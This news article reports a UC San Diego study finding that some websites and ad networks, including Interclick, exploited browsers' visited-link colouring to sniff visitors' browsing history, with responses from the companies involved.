Researchers at the University of California San Diego have discovered a bug that many sites are using to track the browsing behavior of their visitors. The flaw was found on some 485 websites, including YouPorn, Perez Hilton and Wired, and reportedly reveals all of the other sites that each user has previously visited. Of the 485 sites affected by the bug, 63 were found to be copying the data, while 46 were "hijacking" user information, usually to target ads, or find out which rival sites users had visited.
The bug extracts browsing information via a color-changing mechanism that many browsers use to mark sites that you've already visited. A script on YouPorn, for example, would exploit the privacy leak to check which other links to porn sites have already been changed to purple (meaning that you've already clicked on them). "Our study shows that popular Web 2.0 applications like mashups, aggregators, and sophisticated ad targeting are rife with different kinds of privacy-violating flows," the researchers wrote [PDF].
Forbes's Kashmir Hill investigated the sites mentioned in the paper, and discovered that some, including YouPorn and PixMac, had created the code themselves. Others, meanwhile, seemed to obtain it from third-party developers. Hill's trail ultimately led to three advertising networks, including one called Interclick. "Interclick purchases anonymous audience data from several vendors for the purpose of targeting advertising campaigns," the company said in a statement provided to Forbes. "Consequently, it has a number of quality control measures in place to understand the quality and effectiveness of this data. The code observed in the paper was a quality measure being tested."
A spokesman for Morningstar, a finance site cited in the paper, insists that the company was unaware that Interclick had gathered user information via the script. In that particular case, the code automatically scanned a visitor's browsing history for any car sites he or she had previously visited. Interclick, however, says that the test was unsuccessful, and that it stopped running the script in October.
Bookmarks